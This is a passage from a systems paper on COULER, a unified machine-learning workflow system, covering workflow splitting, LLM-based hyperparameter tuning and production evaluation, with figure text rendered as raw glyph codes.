and this process is repeated until\nan artifact with a higher score than a6or adequate storage\ncapacity becomes available to cache a6.\nB. Big Workflow Auto Parallelism Optimization\nIn general, a workflow can be very big (i.e., more than one\nthousand nodes). At A NTGROUP , we run into the case where\nthe workflow involves more than four hundred nodes. This\nwould bring two issues. At first, each workflow is a KubernetesCRD (Custom Resource Definition), the CRD is defined in\nYAML format and the size of CRD is limited to specific\nrequirements. For example, the API server of Kubernetes\nwould be overflowed by the large CRD (e.g., the size of YAML\ncan not bigger than 2MB in practice). Secondly, the user\ncannot define the workflows properly to achieve maximum\nparallelism in a big DAG, therefore, the optimizer of C OULER\nneeds to analyze the dependence of workflow and split the\nworkflow into multiple ones.\nAlgorithm 3 Big Workflow Auto Parallelism Mechanisms\nInput: Budget C, Workflow G\nOutput: Multiple split workflows Ws\n1:Cand← ∅,Ws← ∅\n2:markUnVisited( G)\n3:for all ni∈ N do\n4: ifnot Visited( vi)then\n5: NodeSelection( ni,G,Nc,Cu,Ct)\n6: end if\n7:end for\n8:function SPLIT WORKFLOW (v1,C,G, Ws, Cand )\n9: bi←BudgetOnUnV isitedV ertex (G)\n10: if(b1≤ C)then\n11: Ws←Ws+G\n12: return Ws\n13: end if\n14: MarkVisited( vi)\n15: C←Cand + v1,b2←BudgetOnGraph( C)\n16: ifb2≥ C then\n17: Ws←Ws+Cand, Cand ←v1\n18: else\n19: Cand←C\n20: end if\n21: for all v∈adj(v1)do\n22: ifnot Visited( v)then\n23: SplitWorkflow( v,C,G, Ws, Cand)\n24: end if\n25: end for\n26:end function\nIn this paper, we first define the budget of workflow. The\nbudget is used to decide whether we need to split a big\nworkflow into small ones. The budget (namely C) could be\nthe (a) size of workflow CRD in YAML format: ( α), (b) the\nnumber of steps in a workflow: β, (c) the number of pods: ( γ)\nin a workflow. Thus, C=α+β+γ. In this work, we mainly\nuse the size of workflow αas the default budget value. For\nexample, αexceeds 2 MB or βexceeds 200. Naturally, if a\nworkflow is bigger than a predefined budget, it needs to be\nsplit into small ones.\nGiven the required budget and a big workflow in DAG\nformat, the optimization goal is a problem of finding optimal\nDAG sets to schedule workflow so we can win the maximum\nparallel. It is tempting to reach for classical results [20] in the\noptimal graph topological order to identify an optimal sched-\nule. The topological ordering of a directed graph could be usedto split a big graph into smaller graphs for scheduling. In this\nwork, we identify a workflow sets by depth-first search (DFS)\nover a DAG. Algorithm 3 goes through each vertex of the\ngraph and puts this vertex into a workflow candidates greedily\nuntil each vertex is visited or the workflow meeting the budget\nrequirement. Initially, we mark every vertex as unvisited in\nline 1 and recursively split the related DAG from the unvisited\nvertex one by one from lines 2 to 4. Function SplitWorkflow\nis used to split the input DAG. At first, we check whether the\ncurrent workflow meets the requirement, that is, the budget\nis smaller than the requirement from lines 7 to 9. Next, we\nmark the current vertex v1as visited and check whether it is\npossible to add the vertex v1into the DAG candidate C. if\nthe vertex v1fails to join the current subgraph C, we put the\ncurrent subgraph Cinto the output set of DAGs (namely Ws).\nFinally, we go through the adjacent list of v1and continue to\nsplit the input DAG. Function BudgetOnUnV isitedV ertex\nin line 7 and BudgetOnGraph in line 10 compute the related\nbudget for the input graph for the un-visited vertex of input\nDAG or the whole DAG, respectively. Because we go through\nthe input DAG via the depth first search order, the runtime\ncost of the proposed approach is the number of vertex (i.e.,\nO(|V|)).\nC. Automatic Hyperparameters Tuning\nWe explore the use of LLMs for automatic hyperparame-\nters tuning of machine learning models by analyzing dataset\ncharacteristics from Dataset Card [16] and model information\nfrom Model Card [26]. This approach automates the fine-\ntuning of hyperparameters in machine learning workflows,\nenabling LLMs to generate configurations that enhance model\nperformance. We detail the implementation approach and\ndemonstrate how this automated configuration process im-\nproves the efficiency and effectiveness of model training in\nAlgorithm 4.\nAlgorithm 4 Automatic Hyperparameters Tuning\nInput: Data Card D, Model Card M, Hyperparameters Set\nH, LLM L\nOutput: Targeted Hyperparameters ht\n1:Data Card: comprise of the dataset name, input dataset\ntype, label space, and default evaluation metrics\n2:Model Card: consist of the model name, model structure,\nmodel descriptions, and architecture hyperparameters\n3:foreach hyperparameters hiinHdo\n4: Predicted Training Log:\n5: /* Generate a training log tifor a given hyperparam-\neter setting hiby leveraging LLM L. */\n6:end for\n7:Targeted Hyperparameters:\n8:ht←best performance for hiinHbased on ti\nTo fully exploit the capabilities of LLMs and generate\neffective prompts, we tailor prompts to the Data Card, Model\nCard, and hyperparameters information. The Data Card D\ncomprehensively describes the dataset, including details suchas data name, data type, label space, and evaluation metrics.\nThe Model Card Mprovides a thorough description of the\nmodel, encompassing the model name, structure, description,\nand architecture hyperparameters, while the hyperparameters\ncover various parameter value ranges.\nInitially, we have a hyperparameters set Hcontaining a few\noptional hyperparameters. Without requiring training on actual\nhardware, we employ LLMs to automatically predict perfor-\nmance during the training process, subsequently returning a\ntraining log for each hyperparameters hiinH[58]. This log\ncaptures various parameters and information from the training\nprocess. By examining the training log, we can observe the\neffects of different hyperparameters during training. After sev-\neral rounds of testing, we select the training hyperparameters\nthat yield the best performance. We introduce this procedure\nthrough a running example in Appendix C.\nV. I MPLEMENTATION\nThe Python SDK for C OULER is now open-source. Several\ntop enterprises have integrated this SDK into their produc-\ntion environments. The whole C OULER service is crafted in\nGolang, encompassing all internal components. Regarding the\nexpressiveness of C OULER ’s API compared to the com-\nplete APIs of the supported workflow engines, C OULER has\nachieved over 90% coverage of the Argo API. Additionally, it\nsupports approximately 40-50% of the Airflow API. We are\nactively working to enhance our support for Airflow and other\nworkflow engines. Due to space constraints, we put extensive\ndiscussions on implementation of C OULER into the Appendix\nB.\nVI. E VALUATION\nOur evaluation results, which encompass diverse industrial\nmodels and data spanning several months, aim to address the\nfollowing research questions:\n•RQ1: What is the usage frequency of C OULER in A NT\nGROUP ?\n•RQ2: How effective is the automatic caching performance\nof C OULER ?\n•RQ3: How about the performance of NL to Unified Pro-\ngramming Code Generation?\n•RQ4: How proficient is C OULER ’s capability of automatic\nhyperparameter configuration?\nA. Experiment Setup\nProduction Environment. In A NTGROUP , various types\nof workflows operate concurrently in a shared cluster. The\ncluster provides substantial resources, with about 1,600,000\nCPU cores, 4,500 GPU cores, 3.24 PB of memory, and\n344 PB of disk space. This setup supports A NTGROUP ’s\ndiverse computational needs, enabling different workflows to\nrun efficiently within the same shared resource environment.\nCOULER is utilized to support over 95% of workflows in the\nproduction environment (e.g., 22k/day). The extensive scale of\nworkflow operations provides accurate statistical estimates of\nthe actual gain./uni00000013 /uni00000014/uni00000013 /uni00000015/uni00000013 /uni00000016/uni00000013\n/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni00000048/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000056/uni00000003/uni00000053/uni00000048/uni00000055/uni00000003/uni00000047/uni00000044/uni0000005c/uni0000000b/uni0000004e/uni0000000c/uni00000013/uni00000014/uni00000013/uni00000015/uni00000013/uni00000016/uni00000013/uni00000017/uni00000013/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000015/uni00000015\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000014/uni0000001b(a) Distributin of workflow quantity\n/uni00000013 /uni00000014/uni00000013 /uni00000015/uni00000013 /uni00000016/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000057/uni0000004c/uni00000050/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000044/uni00000003/uni0000005a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni0000000b/uni0000004b/uni00000052/uni00000058/uni00000055/uni00000056/uni0000000c/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000014\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000015/uni00000011/uni0000001a (b) Distributin of workflow lifespan\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000046/uni00000052/uni00000055/uni00000048/uni00000003/uni00000058/uni00000056/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000053/uni00000048/uni00000055/uni00000003/uni0000005a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000013/uni00000018/uni00000014/uni00000013/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000016/uni00000019\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000016/uni00000016 (c) Distributin of CPU core usage\nFig. 5: From July 2022 to July 2023, workflow activity analysis of C OULER in A NTGROUP\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b /uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000015/uni00000018/uni00000013/uni00000011/uni00000016/uni00000013/uni00000013/uni00000011/uni00000016/uni00000018/uni00000013/uni00000011/uni00000017/uni00000013/uni00000013/uni00000011/uni00000017/uni00000018/uni00000013/uni00000011/uni00000018/uni00000013/uni00000013/uni00000011/uni00000018/uni00000018/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni00000003/uni0000000b/uni00000008/uni0000000c/uni00000026/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000026/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n(a) Yearlong evolution of CUR\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b /uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000015/uni00000013/uni00000013/uni00000011/uni00000015/uni00000018/uni00000013/uni00000011/uni00000016/uni00000013/uni00000013/uni00000011/uni00000016/uni00000018/uni00000013/uni00000011/uni00000017/uni00000013/uni00000013/uni00000011/uni00000017/uni00000018/uni00000013/uni00000011/uni00000018/uni00000013/uni00000030/uni00000048/uni00000050/uni00000052/uni00000055/uni0000005c/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni00000003/uni0000000b/uni00000008/uni0000000c/uni00000030/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000030/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c (b) Yearlong evolution of MUR\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b /uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000018/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001a/uni00000013/uni00000011/uni0000001b/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni00000026/uni00000052/uni00000050/uni00000053/uni0000004f/uni00000048/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni0000000b/uni00000008/uni0000000c/uni00000018/uni00000013/uni00000026/uni00000010/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c/uni00000003\n/uni00000018/uni00000013/uni00000026/uni00000010/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c/uni00000018/uni00000013/uni00000026/uni0000000e/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000018/uni00000013/uni00000026/uni0000000e/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c (c) Yearlong evolution of WCR\nFig. 6: From July 2022 to July 2023, 90% workflows in the cluster were transitioned to utilize C OULER in A NTGROUP\nWorkload. We design a multi-modal workflow in an isolated\nproduction environment to minimize interference of the pro-\nduction environment and conduct a more comprehensive as-\nsessment of C OULER ’s capabilities. By selecting appropriate\ncomponent containers for model training, we evaluated the\nsystem’s caching efficiency as well as the performance of its\nAutoML features. This workflow comprises two distinct tasks:\nimage classification and language model fine-tuning. We tested\nthe performance of models such as ViT and nanoGPT. Ad-\nditionally, the workflow incorporates system testing modules\nand model update modules, increasing the task complexity to\nbetter emulate real-world scenarios. The workflow includes 26\ndifferent training scenarios and comprises 52 working pods,\nutilizing over 1.4 million images and 20GB of text data as\ndatasets. Operating in contexts with a significant number of\nparameters and data volume, it effectively showcases C OULER\n’s unique features.\nB. Workflow Activity: RQ1\nInitially, we explore three facets of ML workflows: daily\nusage frequency, typical lifespan, and CPU core usage. We\nfocus on workflows within A NTGROUP from July 2022 to July\n2023. Figure 5a illustrates the distribution of the average daily\nworkflow count, revealing a daily average of 22,000 workflows\nwithin A NTGROUP . We define a workflow’s lifespan as the\nhour count between the timestamps of its newest and oldest\nnodes in its trace, serving as an indicator of its active duration.Figure 5b depicts that, on average, a workflow within A NT\nGROUP remains active for 1 hour. Figure 5c presents the\naverage CPU cores utilized by a workflow during its active\nperiod, with a mean of 36 cores being used per workflow in\nANTGROUP .\nTo assess the effectiveness of C OULER in optimizing work-\nflows, we examine the evolution information of C OULER\nwithin A NTGROUP from July 2022 to July 2023, as depicted\nin Figure 6. It took approximately ten months to execute all\nworkflows with C OULER . Figure 6a reveals that the CPU\nutilization rate (CUR) in machine learning workflow improved\nby 18%. Figure 6b shows that the memory utilization rate\n(MUR) improved by 17%. C OULER ’s enhanced fault tolerance\nsignificantly improved the workflow completion rate (WCR)\nfor workflows running on 50- and 50+ CPU cores. Due to\nthe high utilization rate of C OULER , the CUR, MUR, and\nWCR have seen notable improvements. Therefore, C OULER\nhas effectively optimized ML workflow performance within\nANTGROUP .\nProduction insights. Our work is motivated by previous re-\nsearch conducted within Google GCP [53], which highlighted\nsubstantial computational waste in ML workflows. Building\non these findings, our contributions are diverse, encompassing\nsimplicity and extensibility, automation, efficiency, as well as\nreal-world impact and adoption. We believe the real-world\nadoption and application of our system by A NTGROUP and\nother organizations attest to its practicality and efficacy in/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000014/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000015/uni00000013/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000015/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000017/uni00000013/uni00000011/uni00000013/uni00000019/uni00000013/uni00000011/uni00000013/uni0000001b/uni00000013/uni00000011/uni00000013/uni00000014/uni00000013/uni00000013/uni00000011/uni00000013/uni00000014/uni00000015/uni00000013/uni00000011/uni00000013/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f(a) Multimodal Training\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000015/uni00000013/uni00000013 /uni00000017/uni00000013/uni00000013 /uni00000019/uni00000013/uni00000013 /uni0000001b/uni00000013/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018/uni00000016/uni00000013/uni00000016/uni00000018/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f (b) Image Segmentation\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000015/uni00000013/uni00000013 /uni00000017/uni00000013/uni00000013 /uni00000019/uni00000013/uni00000013 /uni0000001b/uni00000013/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000013/uni00000013 /uni00000014/uni00000017/uni00000013/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000015/uni00000013/uni00000015/uni00000018/uni00000016/uni00000013/uni00000016/uni00000018/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f (c) Language Model Fine-tuning\nFig. 7: Effect of C OULER on Resource Utils and Workflow Execution Time\nproduction settings. Due to space constraints, we put extensive\ndiscussions on production insights into the Appendix E.\nC. Performance Study with Caching: RQ2\n1) Performance study with Automatic caching: We evaluate\nthe impact of C OULER ’s automatic caching strategy on\nworkflow execution efficiency by comparing execution time\nand resource utilization against other caching strategies across\nthree different scenarios:\n•Multimodal Training : This scenario encompasses 37\npods and 19 training models, and involves a training\nprocess that integrates various types of input data such as\ntext, images, and sound, aimed at building more robust\nand adaptable models.\n•Image Segmentation : This scenario includes 15 pods and\n8 training models, focusing on segmenting digital images\ninto multiple parts or sub-regions to identify and locate\nobjects and boundaries within images.•Language Model Fine-tuning : This scenario consists of\n21 pods and 11 training models, primarily focusing on\nfurther training of pre-trained language models tailored\nfor specific tasks such 